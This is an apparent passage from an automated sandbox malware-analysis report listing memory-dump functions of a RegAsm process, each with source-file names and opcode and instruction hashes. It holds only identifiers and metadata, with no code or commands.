                                                                                                                                                                                  • Instruction ID: 20e2278952a3367b3e2a2487de71cbc773708b2221e43c7290744bd5d83f3d89
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b2850e86370624edf1bf455cb589099641c7dce65f68730ddd1e00e62323db0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 29C002252091805AD3469B69E84261AAB616786234F18C2AEA854CB257CB229407C645
                                                                                                                                                                                  Function 05330B80 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                                                                                                                                                  • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                                                                                                                                                                                  • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                                                                                                                                                                                  Function 02CB4732 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e1b21d4d2b32f4350d3ebb840418252b4aee167cb1c28e57fe7a6758fd1eb891
                                                                                                                                                                                  • Instruction ID: 9395f567fc97bcc57910818ebf618a4f6cc2c38162eb67279416bb43f5873cfc
                                                                                                                                                                                  • Opcode Fuzzy Hash: e1b21d4d2b32f4350d3ebb840418252b4aee167cb1c28e57fe7a6758fd1eb891
                                                                                                                                                                                  • Instruction Fuzzy Hash: 27C04C9054D1E15FD70787704CA54A47FF0AD9710034D84DA98E69B1A3CA59A927D349
                                                                                                                                                                                  Function 053437E1 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7d957506de1f564877d9e9b6e8d3323678e397a2849eb2c1df610f0410d491e3
                                                                                                                                                                                  • Instruction ID: d69c649236935ef55e22f61cf4240dc5fb5e7bbfd6449f28a9d7d8bcd0a06d79
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d957506de1f564877d9e9b6e8d3323678e397a2849eb2c1df610f0410d491e3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 16C0122010E2C04AC342C778E841603BF61AB82110F18C0DAA888CF293CB36A806CB01
                                                                                                                                                                                  Function 05343600 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a9760e62c813bfc187eadb0c5ad3fc65116f59bec55062ccef06824b1947012b
                                                                                                                                                                                  • Instruction ID: 38cf8c6e5c3487779ba42bbe0e8b421ecd7d86d1db76cb4b60f4faadff2426c3
                                                                                                                                                                                  • Opcode Fuzzy Hash: a9760e62c813bfc187eadb0c5ad3fc65116f59bec55062ccef06824b1947012b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4DC09B661171904AC305C7F8E452741BF345B41135F28C4CEE4448A257CB2A9D4BC701
                                                                                                                                                                                  Function 05322151 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8a9c06d22473b38ede6d011d6fe42de91da968bef6d1c81985f878457b011a93
                                                                                                                                                                                  • Instruction ID: 44f28914f95b9afc9686ca72e3a14935d0c703d6c60de9a2074838851c9ee430
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a9c06d22473b38ede6d011d6fe42de91da968bef6d1c81985f878457b011a93
                                                                                                                                                                                  • Instruction Fuzzy Hash: 37C09B713040006FC344C55CDC61B59A765DFC570CF19C07D6444C7745CB33D9039554
                                                                                                                                                                                  Function 02CB8AE1 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e3f7cb9089f9f98b8de016ca4ee1b625fadcc6eff1f926086535765e6e03cf0b
                                                                                                                                                                                  • Instruction ID: 709d7aed6e0103de218e029ab5a9d34ccbfd053ad1a1eb572806e8af19fd7d31
                                                                                                                                                                                  • Opcode Fuzzy Hash: e3f7cb9089f9f98b8de016ca4ee1b625fadcc6eff1f926086535765e6e03cf0b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 29C04C752083519F9244DE44D850C66F7A6FBD8714B14CC4EE85547355CB32DC17CB61
                                                                                                                                                                                  Function 05342F50 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e3c63a2dc2419564396d2adbda467bd30358bab2aef3ea8547be28e94fb1521b
                                                                                                                                                                                  • Instruction ID: e3bb453ef7d933ac3a246df00e390063671acc55356200fc5685dd8b0aad7362
                                                                                                                                                                                  • Opcode Fuzzy Hash: e3c63a2dc2419564396d2adbda467bd30358bab2aef3ea8547be28e94fb1521b
                                                                                                                                                                                  • Instruction Fuzzy Hash: ADC08C3020538016C386D778E4007027F246B82214F08C09EE4448F203CF22880BCB04
                                                                                                                                                                                  Function 05343090 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c227b32d23d21bba1fc162bbac763bc0278ecc9c7e339e000fd5ca9f7ca10d61
                                                                                                                                                                                  • Instruction ID: 0d53c08b76ca30ed85a587e8ff0520859508e66c942dc674592e24eeef9ad0fa
                                                                                                                                                                                  • Opcode Fuzzy Hash: c227b32d23d21bba1fc162bbac763bc0278ecc9c7e339e000fd5ca9f7ca10d61
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DC04C3010628057C385D77DD4557467F665B86624F18C0AFAC448F257DB279807DB45
                                                                                                                                                                                  Function 01013511 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a02bd00bc2a43a766bbcca4845fdd465a5848516a1b1fc9c0f198a4e372292c9
                                                                                                                                                                                  • Instruction ID: e0ebad9a142171db5b72cb72c4f6e4c8bac7d179f31f720edd9af03fe2976b98
                                                                                                                                                                                  • Opcode Fuzzy Hash: a02bd00bc2a43a766bbcca4845fdd465a5848516a1b1fc9c0f198a4e372292c9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BC09BE254544037C700D950CC92B917F19E745116F0E80E5E85056556CB5ED905D3A1
                                                                                                                                                                                  Function 01017499 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 18d29d1526be49425b9b5718ab7709e58d24c1685efca308d89f067ce14f9c6c
                                                                                                                                                                                  • Instruction ID: a73fb854d9d5188691fa8da4bcdf9027a14009791a4be6d44e6444532544d5a0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 18d29d1526be49425b9b5718ab7709e58d24c1685efca308d89f067ce14f9c6c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DC01231A14004ABCF046A90D8454ECFA72EF48300F444015FD0176260CA355900AB20
                                                                                                                                                                                  Function 01019A10 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 126222cfd1827ca59ccf594813259c16e76adbb5b0151ad008bf86e15fee85f9
                                                                                                                                                                                  • Instruction ID: 35c0ea79ccbaf7fb043a2800b42d66b11e1d817ea5c034295cdafa62c084c1c5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 126222cfd1827ca59ccf594813259c16e76adbb5b0151ad008bf86e15fee85f9
                                                                                                                                                                                  • Instruction Fuzzy Hash: B1C02BD1414B040BCB009108CC324203B204752803F0A80A7585447183DB08DD01C141
                                                                                                                                                                                  Function 053244B2 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: eacb19fa38a8b8dd232428fe474510b3d35bb0e5693a005cf74f189db4560e6b
                                                                                                                                                                                  • Instruction ID: a2cadf2a0a082f33d48901f8223c5f06bcd9e21b11a5c5d1b353f11e69754815
                                                                                                                                                                                  • Opcode Fuzzy Hash: eacb19fa38a8b8dd232428fe474510b3d35bb0e5693a005cf74f189db4560e6b
                                                                                                                                                                                  • Instruction Fuzzy Hash: A8C04C793001009B8248C619CCA5916F7A5DFD9214714C46D6549C7355EA72EC03C710
                                                                                                                                                                                  Function 053219B1 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ba54d6114bb8f8166e1461f40699852fbf4877d4fdd28b34ff9b5e9eb0c1bbaa
                                                                                                                                                                                  • Instruction ID: 05e24d9fc5b6077c0de22039dd69b22d9afe28360a6af20ac49501d60a480b12
                                                                                                                                                                                  • Opcode Fuzzy Hash: ba54d6114bb8f8166e1461f40699852fbf4877d4fdd28b34ff9b5e9eb0c1bbaa
                                                                                                                                                                                  • Instruction Fuzzy Hash: C0C08C342081108B8200CF04E640C5AF3E2EBD8600B10C80EB80153300CA32DC13CB62
                                                                                                                                                                                  Function 05331C31 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c9ea13885651e3a122929d02b6a0cd3dc7ee463dea0d056a637b0798d0215b40
                                                                                                                                                                                  • Instruction ID: 61a98cab198449e35ee5a15c84b7cbbbcb3331787d46f02a09d71f3f94c256eb
                                                                                                                                                                                  • Opcode Fuzzy Hash: c9ea13885651e3a122929d02b6a0cd3dc7ee463dea0d056a637b0798d0215b40
                                                                                                                                                                                  • Instruction Fuzzy Hash: ADC08C7B5040000FC309C634C852704A760DB80208F18849DA808CF213EE22D6038940
                                                                                                                                                                                  Function 05337E40 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4992545ddf363612f5661b5a78cd1ea8d7c40a88e0af18418596dc8eba038548
                                                                                                                                                                                  • Instruction ID: 807e34637bc2d45be43e7f5128b7b47fd0ca817142b2fcf14e53fb3777a6329e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4992545ddf363612f5661b5a78cd1ea8d7c40a88e0af18418596dc8eba038548
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DC04C3021518056D7D5D77CD451E477F61A786314F28C59EE4648F267CB26A407C745
                                                                                                                                                                                  Function 05330AA0 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f71f497fcb9d926fc7293cd3f256dcd99b0975896850089fa3b4ac7d9088269f
                                                                                                                                                                                  • Instruction ID: 5361b518402d2fda246b1b180d89461954e31a952d4d9385ec539af1d0680f23
                                                                                                                                                                                  • Opcode Fuzzy Hash: f71f497fcb9d926fc7293cd3f256dcd99b0975896850089fa3b4ac7d9088269f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 65C08C301073901AC382D76CF4027027F206B81124F48C0AEE4848F247CF22A503E708
                                                                                                                                                                                  Function 02CB3728 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                  • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                                                                                                  • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                                                                                                  Function 02CB5418 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                  • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                                                                                                  • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                                                                                                  Function 02CB5EB8 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                  • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                                                                                                  • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                                                                                                  Function 05340383 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 75ba89f5aee2c1bb4d6cbcbcd29331bac26e5c02bb3e31f16ac4a47ce4559ed1
                                                                                                                                                                                  • Instruction ID: a08c9d0dc58502cf2933ab01d898880a8d6cf686a2a406852017e635ce750656
                                                                                                                                                                                  • Opcode Fuzzy Hash: 75ba89f5aee2c1bb4d6cbcbcd29331bac26e5c02bb3e31f16ac4a47ce4559ed1
                                                                                                                                                                                  • Instruction Fuzzy Hash: DEC08C7060008016C349C664C812B05AB20EB86310F18C0ADA004CF287CB2288028684
                                                                                                                                                                                  Function 05343230 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e8969c5ad5028f90d16de0dac01ec92b6710ac720c518f186cddd98d67296119
                                                                                                                                                                                  • Instruction ID: cd9600fc1b81973c699454798a903401b0bd478fa5252f577661c9fae1702cc2
                                                                                                                                                                                  • Opcode Fuzzy Hash: e8969c5ad5028f90d16de0dac01ec92b6710ac720c518f186cddd98d67296119
                                                                                                                                                                                  • Instruction Fuzzy Hash: 64C04C252061808BC381C7BCD849741BF709B41125F1C809B98444A153DB269506C701
                                                                                                                                                                                  Function 053426B0 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f38447f917d2520ea076f977576906c3c0b9700a052d5119ba83712ef8adbfaf
                                                                                                                                                                                  • Instruction ID: b90c9a525b87f61ff620250600f8c3ba93c15db06815097db734e9b7ac425cb4
                                                                                                                                                                                  • Opcode Fuzzy Hash: f38447f917d2520ea076f977576906c3c0b9700a052d5119ba83712ef8adbfaf
                                                                                                                                                                                  • Instruction Fuzzy Hash: 04C09B201151C05BC741DF74D441745FF70BB41214F58C0DDD4554A153CB279D07DB02
                                                                                                                                                                                  Function 01015572 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e3edc63ddfe40dc16cb774815f6b05c528ee7dc8b1bf4600b8538ae8fd246715
                                                                                                                                                                                  • Instruction ID: b9829cf36f550cd8e52f0bb21f6f1c79fd845fcad5f727257e98afbfccd86a90
                                                                                                                                                                                  • Opcode Fuzzy Hash: e3edc63ddfe40dc16cb774815f6b05c528ee7dc8b1bf4600b8538ae8fd246715
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CB012B310100017C308C500CC82F4C6618D7C0125F2D40A5B8649D595CF0DE503D510
                                                                                                                                                                                  Function 01015460 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 92e5f2bceeffbd2f500a1908fe92c863e6b1197f14deade5313251c3358c7510
                                                                                                                                                                                  • Instruction ID: 696bb01f6c75834e9ec511fa63ad608c343fcbfadb3e07eeff647d573b8d4201
                                                                                                                                                                                  • Opcode Fuzzy Hash: 92e5f2bceeffbd2f500a1908fe92c863e6b1197f14deade5313251c3358c7510
                                                                                                                                                                                  • Instruction Fuzzy Hash: A6C04CF55096804BDB018F64DDA67147F745B52206F0EC0DBD8558D19BCB15C916D721
                                                                                                                                                                                  Function 05327D40 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                  • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                                                                                                  • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                                                                                                  Function 0532A978 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                  • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
